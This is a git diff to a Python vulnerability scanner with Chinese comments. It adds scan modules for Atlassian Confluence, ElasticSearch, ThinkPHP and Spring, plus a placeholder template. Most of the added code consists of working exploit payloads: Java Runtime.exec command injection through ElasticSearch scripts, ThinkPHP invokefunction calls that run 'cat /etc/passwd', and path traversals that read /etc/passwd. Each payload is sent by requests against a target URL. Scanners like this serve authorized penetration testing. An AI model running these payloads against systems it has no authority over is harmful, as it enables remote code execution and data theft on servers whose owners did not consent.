+ logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if ((('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + or (('' in res.text) and ('Confluence' in res.text)) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path + } + } + return results + + def cve_2022_26134_scan(self, url): + ''' 2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞, + 攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2022-26134' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2022_26134_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + res_md = "'X-Cmd-Response': '" + self.md + if (res_md in check.check_res(str(res.headers), res_md)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path + } + } + return results + + def addscan(self, url): + return [ + thread(target=self.cve_2019_3396_scan, url=url), + thread(target=self.cve_2021_26084_scan, url=url), + thread(target=self.cve_2015_8399_scan, url=url), + thread(target=self.cve_2022_26134_scan, url=url) + ] + +confluence = AtlassianConfluence() \ No newline at end of file diff --git a/payloads/Django.py b/payloads/Django.py index fa9ca12..f5bae97 100644 --- a/payloads/Django.py +++ b/payloads/Django.py @@ -363,7 +363,8 @@ def cve_2021_35042_scan(self, url): logger.logging(vul_info, 'Error') return None - if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) and ('Request information' in res.text)): + if ((('OperationalError' in res.text) or ('DatabaseError' in res.text)) + and ('Request information' in res.text)): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py new file mode 100644 index 0000000..ddcf5d8 --- /dev/null +++ b/payloads/ElasticSearch.py @@ -0,0 +1,369 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + ElasticSearch扫描类: + 1. ElasticSearch 命令执行 + CVE-2014-3120 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/ + + 2. ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 + CVE-2015-1427 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/ + + 3. ElasticSearch 目录穿越 + CVE-2015-3337 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ + + 4. ElasticSearch 目录穿越 + CVE-2015-5531 + Payload: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/ + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + # Elasticsearch写入webshell + # WooYun-2015-110216 + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class ElasticSearch(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'ElasticSearch' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2014_3120_payloads = [ + { + 'path': 'website/blog/', + 'data': '{"name": "mouse"}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_search?pretty', + 'data': '''{ + "size": 1, + "query": { + "filtered": { + "query": { + "match_all": { + } + } + } + }, + "script_fields": { + "command": { + "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\\\\\A\\").next();" + } + } +}'''.replace('COMMAND', self.cmd), + 'headers': head.merge(self.headers, {}) + } + ] + + self.cve_2015_1427_payloads = [ + { + 'path': 'website/blog/', + 'data': '{"name": "mouse2"}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_search?pretty', + 'data': '{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"COMMAND\\").getText()"}}}'.replace('COMMAND', self.cmd), + 'headers': head.merge(self.headers, {}) + } + ] + + self.cve_2015_3337_payloads = [ + { + 'path': '_plugin/head/../../../../../../../../../etc/passwd', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + ] + + self.cve_2015_5531_payloads = [ + { + 'path': '_snapshot/mouse3', + 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3"}}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_snapshot/mouse33', + 'data': '{"type": "fs","settings": {"location": "/usr/share/elasticsearch/repo/mouse3/snapshot-backdata"}}', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': '_snapshot/mouse3/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd', + 'data': '', + 'headers': head.merge(self.headers, {}) + } + ] + + def cve_2014_3120_scan(self, url): + ''' 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作, + 而MVEL可执行Java代码, 而且没有沙盒, 所以我们可以直接执行任意代码 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2014-3120' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2014_3120_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + sleep(1) + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (self.md in check.check_res(res.text, self.md)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data + } + } + return results + + def cve_2015_1427_scan(self, url): + ''' ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本, + 但显然官方的工作并没有做好, lupin和tang3分别提出了两种执行命令的方法 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2015-1427' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2015_1427_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + sleep(1) + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (self.md in check.check_res(res.text, self.md)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data + } + } + return results + + def cve_2015_3337_scan(self, url): + ''' 在安装了具有“site”功能的插件以后, 插件目录使用../即可向上跳转, + 导致目录穿越漏洞, 可读取任意文件, 没有安装任意插件的elasticsearch不受影响 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead' + vul_info['vul_id'] = 'CVE-2015-3337' + vul_info['vul_method'] = 'GET' + + for payload in self.cve_2015_3337_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text)): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path + } + } + return results + + def cve_2015_5531_scan(self, url): + ''' elasticsearch 1.5.1及以前, 无需任何配置即可触发该漏洞; + 之后的新版, 配置文件elasticsearch.yml中必须存在path.repo, 该配置值为一个目录, 且该目录必须可写, + 等于限制了备份仓库的根位置, 不配置该值, 默认不启动这个功能 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'FileRead' + vul_info['vul_id'] = 'CVE-2015-5531' + # vul_info['vul_method'] = 'PUT/GET' + vul_info['vul_method'] = 'GET' + + for payload in range(len(self.cve_2015_5531_payloads)): + # path = payload['path'] + # data = payload['data'] + # headers = payload['headers'] + + path = self.cve_2015_5531_payloads[payload]['path'] + data = self.cve_2015_5531_payloads[payload]['data'] + headers = self.cve_2015_5531_payloads[payload]['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + if (payload in [0, 1]): + res = requests.put( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + continue + + # elif payload == 2 + sleep(0.5) + res = requests.get( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (res.status_code == 400 + and ('114, 111, 111, 116' in res.text) + and ('Failed to derive' in res.text) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Prompt': 'ASCII decimal encode' + } + } + return results + + def addscan(self, url): + return [ + thread(target=self.cve_2014_3120_scan, url=url), + thread(target=self.cve_2015_1427_scan, url=url), + thread(target=self.cve_2015_3337_scan, url=url), + thread(target=self.cve_2015_5531_scan, url=url) + ] + +elasticsearch = ElasticSearch() \ No newline at end of file diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py index 620a9ec..b71fbac 100644 --- a/payloads/F5BIGIP.py +++ b/payloads/F5BIGIP.py @@ -107,7 +107,14 @@ def cve_2020_5902_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('encrypted-password' in res.text) or ('partition-access' in res.text) or (('"output": "' in res.text) and ('"error": "",' in res.text)) or ('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (('encrypted-password' in res.text) + or ('partition-access' in res.text) + or (('"output": "' in res.text) and ('"error": "",' in res.text)) + or ('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -167,7 +174,9 @@ def cve_2022_1388_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('commandResult' in res.text) and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text))): + if (('commandResult' in res.text) + and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/Fastjson.py b/payloads/Fastjson.py index 5d6b5fa..212eff6 100644 --- a/payloads/Fastjson.py +++ b/payloads/Fastjson.py @@ -130,7 +130,7 @@ def cve_2017_18349_scan(self, url): vul_info = {} vul_info['app_name'] = self.app_name vul_info['vul_type'] = 'unSerialize' - vul_info['vul_id'] = 'CVE-2017-18349' + vul_info['vul_id'] = 'CNVD-2017-02833' vul_info['vul_method'] = 'POST' vul_info['headers'] = { 'Content-Type': 'application/json' diff --git a/payloads/Spring.py b/payloads/Spring.py index 300d982..819bc71 100644 --- a/payloads/Spring.py +++ b/payloads/Spring.py @@ -306,7 +306,11 @@ def cve_2020_5410_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (('/sbin/nologin' in res.text) + or ('root:x:0:0:root' in res.text) + or ('Microsoft Corp' in res.text) + or ('Microsoft TCP/IP for Windows' in res.text) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -446,7 +450,9 @@ def cve_2022_22947_scan(self, url): ) logger.logging(vul_info, res3.status_code, res3) # * LOG - if ((res3.status_code == 200) and (('/sbin/nologin' in res3.text) or ('root:x:0:0:root' in res3.text))): + if ((res3.status_code == 200) + and (('/sbin/nologin' in res3.text) + or ('root:x:0:0:root' in res3.text))): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -474,7 +480,7 @@ def addscan(self, url): return [ thread(target=self.cve_2020_5410_scan, url=url), thread(target=self.cve_2021_21234_scan, url=url), - # thread(target=self.cve_2022_22965_scan, url=url), + thread(target=self.cve_2022_22965_scan, url=url), thread(target=self.cve_2022_22963_scan, url=url), thread(target=self.cve_2022_22947_scan, url=url) ] diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py index 5234418..6e3e64e 100644 --- a/payloads/ThinkPHP.py +++ b/payloads/ThinkPHP.py @@ -19,15 +19,22 @@ 暂无编号 Payload: https://vulhub.org/#/environments/thinkphp/in-sqlinjection/ + 5. ThinkPHP5.x 远程代码执行 + CVE-2018-1002015 + Payload: https://www.cnblogs.com/defyou/p/15762860.html + 其它奇奇怪怪的Payload: https://baizesec.github.io/ ''' +from lib.api.dns import dns from lib.initial.config import config -from lib.tool.md5 import md5 +from lib.tool.md5 import md5, random_md5 from lib.tool.logger import logger from lib.tool.thread import thread from lib.tool import check +from lib.tool import head from thirdparty import requests +from time import sleep class ThinkPHP(): def __init__(self): @@ -79,6 +86,19 @@ def __init__(self): } ] + self.cve_2018_1002015_payloads = [ + { + 'path': 'index.php?s=index/\\think\\Container/invokefunction', + 'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'index.php?s=index/\\think\\Container/invokefunction', + 'data': 'function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1', + 'headers': head.merge(self.headers, {}) + } + ] + # * 以下payload没有找到测试环境, 所以没写poc, 哪个好心人提供一下环境QAQ self.thinkphp_5_options_sqlinject_payloads = [ { @@ -158,7 +178,10 @@ def cnvd_2018_24942_scan(self, url): return None # * 判断扫描结果 - if (self.md in check.check_res(res.text, self.md)) or (('PHP Version' in res.text) and ('PHP License' in res.text)): + if (self.md in check.check_res(res.text, self.md) + or (('PHP Version' in res.text) + and ('PHP License' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -212,7 +235,7 @@ def cnnvd_201901_445_scan(self, url): return None # * 判断扫描结果 - if self.md in check.check_res(res.text, self.md): + if (self.md in check.check_res(res.text, self.md)): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -334,12 +357,72 @@ def thinkphp_5_ids_sqlinject_scan(self, url): } return results + def cve_2018_1002015_scan(self, url): + ''' ThinkPHP 5.0.23及5.1.31以下版本RCE + ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞, + 该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤, + 远程攻击者可通过输入字符 \ 的方式调用任意方法利用该漏洞执行代码 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2018-1002015' + vul_info['vul_method'] = 'POST' + + for payload in self.cve_2018_1002015_payloads: + path = payload['path'] + data = payload['data'] + headers = payload['headers'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (('root:x:0:0:root' in res.text) + or (('PHP Version' in res.text) + and ('PHP License' in res.text)) + ): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data + } + } + return results + def addscan(self, url): return [ thread(target=self.cnvd_2018_24942_scan, url=url), thread(target=self.cnnvd_201901_445_scan, url=url), thread(target=self.thinkphp_2_x_rce_scan, url=url), - thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url) + thread(target=self.thinkphp_5_ids_sqlinject_scan, url=url), + thread(target=self.cve_2018_1002015_scan, url=url) ] thinkphp = ThinkPHP() \ No newline at end of file diff --git a/payloads/demo2.py b/payloads/demo2.py new file mode 100644 index 0000000..cd55e3c --- /dev/null +++ b/payloads/demo2.py @@ -0,0 +1,134 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + XXXXX扫描类: + XXXXX 未开启强制路由RCE + CNVD-2018-24942 +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +file:///C:/Windows/System32/drivers/etc/hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class 1(): # ! 1: 类名(例如 ThinkPHP) + ''' 标有数字的地方都需要自己填写 ''' + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers').copy() + self.proxies = config.get('proxies') + + self.app_name = '2' # ! 2: 漏洞框架/应用程序/CMS等(例如 thinkphp) + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.3_payloads = [ # ! 3: Payload的名称(例如 cnvd_2018_24942_payloads) + { + 'path': '4', # ! 4: url路径(例如/admin/login) + 'data': '5', # ! 5: POST数据, 没有的话可以不写 + 'headers': head.merge(self.headers, {}) # ! 6: Headers请求头, 填在{}里面, 字典形式; 没有的话可以不写, 不写的话将使用默认请求头; 如果存在同名的请求头, 则会覆盖掉原来的 + }, + ] + + def 7_scan(self, url): # ! 7: POC的名称(例如 cnvd_2018_24942_scan) + ''' ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = '8' # ! 8: 漏洞类型(例如 RCE) + vul_info['vul_id'] = '9' # ! 9: 漏洞编号(例如 CNVD-2018-24942) + vul_info['vul_method'] = '10' # ! 10: 请求方式(例如 GET) + + for payload in range(len(self.3_payloads)): # ! 3: 同上, Payload的名称 + path = self.3_payloads[payload]['path'] # ! 3: 同上, Payload的名称 + data = self.3_payloads[payload]['data'] # ! 3: 同上, Payload的名称 + headers = self.3_payloads[payload]['headers'] # ! 3: 同上, Payload的名称 + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['headers'] = headers + vul_info['target'] = target + + try: + if payload == 0: # * 当payload为第1个时, 执行xxx操作 + res = requests.11( # ! 11: 请求方式(例如 get) + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + elif payload == 1: # * 当payload为第2个时, 执行xxx操作 + res = requests.11( # ! 11: 请求方式(例如 get) + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + '''!!! + 可以自定义results中的信息, 格式: + 标题: 值(str/list/dict) + str类型: key: value的格式进行显示 + list类型: 会以key: value value value ...的格式进行显示 + dict类型: 会以↓的格式进行显示 + dict: + key1: value1 + key2: value2 + ... + ''' + if ('12'): # ! 12: 判断扫描结果 + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data, + 'Cookie': 'xxx', + 'Headers': headers + } + } + return results + + def addscan(self, url): + return [ + thread(target=self.6_scan, url=url) # ! 6: 同上, POC的名称 + ] + +13 = 1() # ! 1: 同上, 类名 + +''' + # ! 13: 对象名称 + # ! 需要在vulcat/lib/initial/config.py加入对象名称, 找到以下代码并继续添加 + app_list = ['alidruid', 'airflow', 'apisix', 'cisco', 'django', 'fastjson'] + # ! 然后在vulcat/lib/core/coreScan.py引入POC, 引入方式为 + from payloads.文件名 import 对象名称 + # ! 引入完成后, 自定义POC就成功了, 可以运行vulcat试试效果 +''' \ No newline at end of file